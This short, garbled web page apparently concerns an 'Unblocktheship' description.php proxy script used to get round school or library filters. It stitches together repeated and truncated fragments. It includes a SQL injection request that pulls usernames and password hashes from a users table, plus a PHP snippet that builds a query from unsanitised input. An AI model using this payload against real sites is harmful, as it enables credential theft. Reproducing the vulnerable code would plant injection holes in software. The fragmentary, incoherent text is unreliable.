Unblocktheship Description.php ((full))

: Many of these scripts are optimized to run on web servers with PHP-Curl enabled, allowing the proxy to communicate with the main site without being easily flagged. How to Use the Unblocktheship Script

GET /description.php?id=-1 UNION SELECT 1,2,username,password,5 FROM users-- unblocktheship description.php

If the application prints database results to the screen, the attacker will see the username:password hash printed in the description field of the webpage. : Many of these scripts are optimized to

<?php // Vulnerable Example Logic $id = $_GET['id']; // Input not sanitized $query = "SELECT * FROM ships WHERE id = " . $id; $result = mysqli_query($connection, $query); // ... output logic ... ?> $result = mysqli_query($connection

Small-scale unblocking sites, school/library proxy pages, or personal use.